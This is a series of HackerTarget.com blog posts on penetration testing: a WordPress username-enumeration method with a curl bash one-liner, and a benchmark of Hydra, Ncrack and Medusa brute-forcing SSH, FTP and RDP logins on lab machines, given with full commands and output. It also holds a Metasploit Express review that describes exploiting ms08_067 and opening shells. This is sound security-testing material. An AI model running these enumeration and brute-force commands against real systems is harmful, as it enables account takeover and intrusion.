brute force – HackerTarget.com

WordPress User Enumeration

the admin — Thu, 10 Oct 2019 14:12:41 +0000

These three enumeration techniques are a very fast way to identify users of a WordPress installation. With valid usernames effective brute force attacks can be attempted to guess the password of the user accounts.

WordPress User Enumeration via Author Archives

Finding users by iterating through the author archives is a common technique that works in all versions of WordPress by default.

Users have a unique user id that is used by the application in the database and for referencing the user account. By attempting to load the author archive for each user id, we quickly identify valid account id's and the username that matches the account. This includes the admin username (usually ID:1). This is not a new trick and is available in a number of WordPress Security Testing tools.

How does it work?

We can make a simple HTTP request to https://wordpressexample.com/?author=1. You can try this in a browser. In the web developer tools take a look at the Network tab and view the HTTP response received from the request. If it worked you will see something like this:

Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Date: Thu, 17 Oct 2019 23:12:26 GMT
Location: https://wordpressexample.com/author/fred/
Server: nginx/1.10.3 (Ubuntu)

We can see in the response that the Location: header reveals the username for userid 1 as "fred". This indicates the admin account was renamed to "fred".

Bash One Liner - Get all the Usernames

Here is a quick bash one liner that will cycle through as many users as you want and enumerate the usernames. So if you don't have a WordPress Scanner such as WPScan or Nmap NSE scripts you can try this bash trick.

for i in {1..5}; do curl -s -L -i http://www.wordpress-site-to-test.com/?author=$i | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z\-\.]*|Location:.*" | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done

Change the 5 to however many users you want to enumerate. The command will iterate through the authors (users) and use grep to pull from the Location Header or the HTML of the actual page, depending on the sites configuration and response.

WordPress Enumeration via JSON API

Using a json endpoint it may be possible to get a list of users on the site. This was restricted in version 4.7.1 to only show a user that has published a post and if configured, before that all users were shown by default.

https://wordpressexample.com/wp-json/wp/v2/users

WordPress Enumeration via the Login Form

Brute forcing the user name is possible using the login form as the response is different for a valid vs an invalid account.

Using a tool such as Burp Intruder in Burp Suite, we would load a list of possible usernames and cycle through HTTP POST requests to the WordPress login form examining the response.

A HTTP response that matches "invalid password" indicates the username is valid. We could then move onto attacking the password using the same process with a common password list.

Conclusion

This WordPress user enumeration technique will often work on sites that have taken the trouble to rename the admin account to something else to reduce the chance of a successful brute force attack. It is WordPress security 101, but these enumeration techniques show that no matter what your username is strong passwords are essential.

Enumerate & Exploit

Discover advanced WordPress hacking techniques

Attacking WordPress

Hosted Security Scanners
& Tools

Test WordPress, Servers & Networks

Use cases & more info

The post WordPress User Enumeration appeared first on HackerTarget.com.

Security Testing WordPress

the admin — Tue, 19 Jul 2011 06:03:59 +0000

A couple of wordpress security assessment tools have popped up over the past couple of months, this has to be a good thing with the number of WordPress installations sky-rocketing.

First of course there is the HackerTarget's own WordPress Security Scan, externally facing and coming in at a fairly high level. The system downloads some of your pages, does analysis, checks a few additional links and gives you a tidy little report detailing any security issues discovered. Our Professional services provide an independent security review of your WordPress powered site with our WordPress Assessment.

Need an expert?
We will identify and validate ways to improve your security

WordPress Assessment

Our scan does not perform brute forcing of accounts, passwords or plugins. Brute Forcing is more appropriate in a targeted pen-test or black-box vulnerability assessment.

Simply put brute forcing:

Plugins is achieved by testing URL's: http://myexampleblog.cm/wp-content/plugins/$pluginname
Usernames can be brute forced with a POST request to the login form (Incorrect username)
Passwords can be brute forced (with valid username) by hitting the login form

Additionally username's can also be gathered through some WordPress themes, RSS feeds, and author page URI's such as /blog/author/admin/.

These tools and scripts that can be utilized in your Penetration Testing of WordPress.

Metasploit has a module for enumerating usernames and brute forcing passwords. It is solid and convenient; everyone has Metasploit installed... don't they?

An NSE (nmap scripting engine) script was released for Nmap that does plugin brute forcing.

Just in the last few days a new tool hit the tubes wpscan. Still under development it does a few different checks including brute forcing for accounts.

All the tools referenced above are dedicated towards external testing of wordpress installations. There are other options that involve installation of plugins into the wordpress installations for deeper monitoring.

The post Security Testing WordPress appeared first on HackerTarget.com.

Brute Forcing Passwords with ncrack, hydra and medusa

the admin — Fri, 06 May 2011 04:18:08 +0000

Ready to test a number of password brute-forcing tools? Passwords are often the weakest link in any system and ultimately brute-force. Testing for weak passwords is an important part of security vulnerability assessments.

This article will focus on tools that allow remote service brute-forcing. These are typically Internet facing services that are accessible from anywhere in the world. Another type of password brute-force attack are against the password hash. Powerful tools such as Hashcat can crack encrypted password hashes on a local system.

The three tools assessed are Hydra, Medusa and Ncrack (from nmap.org).

Installation

Installation of all three tools was straight forward on Ubuntu Linux. Use the standard method to compile an application from source. Alternatively the three tools come pre-packages on Kali.

wget https://nmap.org/ncrack/dist/ncrack-0.7.tar.gz
./configure
make
make install

wget https://github.com/vanhauser-thc/thc-hydra/archive/v9.0.tar.gz
./configure
make
make install

wget http://www.foofus.net/jmk/tools/medusa-2.2.tar.gz
./configure
make
make install

Password List

I grabbed a list of 500 passwords from skullsecurity.org. Of course, you can find password lists with many thousands or even millions of passwords. You will need to choose what is most appropriate for your password testing as factors such as target type and rate of testing will be major factors.

wget https://downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2

bzip2 -d 500-worst-passwords.txt.bz2

Series of tests

The following tests were performed against a Linux Virtual Machine running on Virtualbox. Speed will vary depending on whether the target is local, the latency of the connection, and even the processing power of the target system. Heavy brute forcing can impact a targets CPU potentially causing a denial of service condition. Take care if testing production systems.

Test 1 - SSH

The first series of tests was against SSH. I set the root account with the password toor. I added toor to the end of the 500 password list at number 499.

~# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-05 16:45:19
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 185.00 tries/min, 185 tries in 00:01h, 315 todo in 00:02h
[STATUS] 183.00 tries/min, 366 tries in 00:02h, 134 todo in 00:01h
[22][ssh] host: 10.10.10.10   login: root   password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-05 16:48:08

Successfully found the password with Hydra!

~# ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-05 16:50 EST
Stats: 0:00:18 elapsed; 0 services completed (1 total)
Rate: 0.09; Found: 0; About 6.80% done; ETC: 16:54 (0:04:07 remaining)
Stats: 0:01:46 elapsed; 0 services completed (1 total)
Rate: 3.77; Found: 0; About 78.40% done; ETC: 16:52 (0:00:29 remaining)

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 138.03 seconds.

Ncrack finished.

Successfully found the password with Ncrack!

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

~ 1500 seconds

Success again with Medusa, however it took over 10 times as long with the default settings of each tool.

Test 2 - Speed

Lets try and speed things up a bit.

Cranking up Medusa speed to use 5 concurrent logins fails with the following error:

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mustang (7 of 500 complete)
medusa: ath.c:193: _gcry_ath_mutex_lock: Assertion `*lock == ((ath_mutex_t) 0)' failed.
Aborted

Trying Ncrack at a faster rate was a bit faster but not much.

ncrack -p ssh -u root -P 500-worst-passwords.txt -T5 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 09:04 EST

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 128.98 seconds.

Ncrack finished.

Is Hydra any faster? Here I added the option for 32 threads.

$ hydra -t 32 -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 12:44:03
[DATA] 32 tasks, 1 servers, 500 login tries (l:1/p:500), ~15 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 184.00 tries/min, 184 tries in 00:01h, 316 todo in 00:02h
[STATUS] 185.50 tries/min, 371 tries in 00:02h, 129 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
[22][ssh] host: 10.10.10.10   login: root   password: toor
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 12:46:57

No change really. Perhaps the limiting factor for Hydra and Ncrack is the speed of response from the VirtualBox machine. Either way, it appears the default speed is pretty good for both tools.

Test 3 - FTP server

Now to try hitting the FTP server on the same host (vsftpd).

ncrack -u test -P 500-worst-passwords.txt 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:53 EST
Stats: 0:00:40 elapsed; 0 services completed (1 total)
Rate: 5.94; Found: 0; About 47.20% done; ETC: 12:54 (0:00:45 remaining)
Stats: 0:00:59 elapsed; 0 services completed (1 total)
Rate: 6.93; Found: 0; About 88.00% done; ETC: 12:54 (0:00:08 remaining)

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 69.01 seconds.

Attempting to push it faster....

$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:55 EST
Stats: 0:00:03 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done
Stats: 0:00:06 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 66.01 seconds.

Same result. Limiting factor is likely the VM.

$ hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 13:07:43
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ftp on port 21

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

[STATUS] 219.00 tries/min, 219 tries in 00:01h, 281 todo in 00:02h
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
[STATUS] 233.06 tries/min, 470 tries in 00:02h, 30 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 13:09:56

Oops, did we crash the FTP service?

Now testing with Medusa.

~$ medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: password (2 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 12345678 (3 of 500 complete)
ERROR: [ftp.mod] failed: medusaReceive returned no data. Server may have dropped connection due to lack of encryption. Enabling the EXPLICIT mode may help.
CRITICAL: Unknown ftp.mod module state -1

Medusa also appears to be struggling.

Lets go back and check again with ncrack to ensure the service is still ok.

~$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:14 EST

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 62.99 seconds.

Ncrack finished.

ncrack for the win!

ncrack has the ability to also brute force RDP accounts. Lets hit a Windows box with Microsoft Remote Desktop Protocol enabled.

$ ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:26 EST
Stats: 0:02:18 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 3.40% done; ETC: 14:33 (1:05:21 remaining)
Stats: 0:15:07 elapsed; 0 services completed (1 total)
Rate: 0.20; Found: 0; About 13.80% done; ETC: 15:15 (1:34:25 remaining)
Stats: 0:22:19 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 19.40% done; ETC: 15:21 (1:32:43 remaining)
Stats: 0:24:46 elapsed; 0 services completed (1 total)

Discovered credentials for rdp on 10.212.50.21 3389/tcp:
10.212.50.21 3389/tcp rdp: 'administrator' 'toor'

Ncrack done: 1 service scanned in 6072 seconds.

Protocol support varies for the different tools:

Hydra - TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa -  AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper,
Web Form

Ncrack - RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

Conclusion

There is much more that could be tested for a more comprehensive review. Other protocols, different targets, latency, and further tweaking of the scan speeds and threads.

While ncrack has limited protocol support compared to Hydra and Medusa, the only conclusion for this little test when it comes to speed, reliability, and the ability to hit RDP services ncrack wins!!

Note:
Problems noted above regarding Hydra have been addressed and after testing it can be confirmed these issues are no longer present.

CHANGELOG for 6.4
   =================
   * Update SIP module to extract and use external IP addr return from server error to bypass NAT
   * Update SIP module to use SASL lib
   * Update email modules to check clear mode when TLS mode failed
   * Update Oracle Listener module to work with Oracle DB 9.2
   * Update LDAP module to support Windows 2008 active directory simple auth
   * Fix to the connection adaptation engine which would loose planned attempts
   * Fix make script for CentOS, reported by ya0wei
   * Print error when a service limits connections and few pairs have to be tested
   * Improved Mysql module to only init/close when needed
   * Added patch from the FreeBSD maintainers
   * Module usage help does not need a target to be specified anymore
   * configure script now honors /etc/ld.so.conf.d/ directory

Check out our Free IP and Network Testing tools.

Discover - Explore - Learn.

recon my target

Next level testing with advanced Security Vulnerability Scanners.

Trusted tools. Hosted for easy access.

Use cases & more info

The post Brute Forcing Passwords with ncrack, hydra and medusa appeared first on HackerTarget.com.

Metasploit Express Review

the admin — Wed, 02 Jun 2010 07:05:18 +0000

Metasploit Express with Ubuntu

Announcement: End of life for Metasploit Express Jun 4th 2019 - Read Notice here

The purchase of Metasploit by Rapid7 last year and the recent release of Metasploit Express has been big news in the security community.

I have finally gotten around to giving it a spin. So what is Metasploit Express? It is a web based front end for Metasploit that provides not only easy access to the underlying tool it also adds reporting and organisation to your penetration testing. Allowing projects to be saved, results stored and tested.

Sure does beat running metasploit and using a flat text file for your project database.

I grabbed a copy of the Trial Version from the Metasploit website.

#chmod +x metasploit-3.4.0-linux-x64-installer.bin
# ./metasploit-3.4.0-linux-x64-installer.bin

Install was gui based and simple enough. Following the installation I was directed to web based console.

https://localhost:3790/

Create a user account.

Enter Product Key and Activate with Rapid7.com. A friendly reminder that we are in the world of commercial software.

Created Test1 and ran the initial scan

Resource usage is very low during scanning phase. Memory usage considerably less than firefox and barely touched the sides of CPU on my old Core2duo.

Against my 3 hosts I ran the brute force module. All settings are defaults.

Note the windows host has login Administrator with password test and admin with password. The Linux host has password of test on the root account.

I was surprised that these were not discovered during the brute scans.

I redid the brute force module after changing the root password to "toor". Success! It seems the dictionary may not have been large enough for root / test.

Update: as noted by HD Moore selecting the deep option rather than default on the brute force would have hit on "test".

Using the session from the brute forced credentials I was able to gather data from the system with prebuilt scripts and get full access via a shell.

Onto the exploitation module.

Session found on the windows XP host as expected ms08_067 was successfully exploited.

Switching to the session tab (nice that while scans are running you can move about the console) reveals prebuilt modules that can be performed with the session - collect system data, virtual desktop, access file system, and command shell. These are straight out of meterpreter.

I grabbed some system data and found the display of the collected data is clear and easy to get to.

Accessing the virtual desktop I was able to connect using a java applet, the other choice to manually use a vnc viewer was also available.

Browsing the file system is all web based, fast and responsive, allowing browsing of the system drives looking for data to snarf.

Lastly direct access to the meterpreter shell is right there, giving you full access to the session through the web console.

Reports linked here

During my testing I did not have a working NexPose Vulnerability Scanner install, however note that this is also an option for enumeration of the vulnerabilities and would be interesting to see in action.

Overall this is a quality product, utilising the underlying framework the web based front end is solid enhancement that is definitely worth the price, whether you are running metasploit on a daily basis and need access to the reporting and backend database or if you run it occasionally within your environment this puts the power of the tool only a few clicks away.

The post Metasploit Express Review appeared first on HackerTarget.com.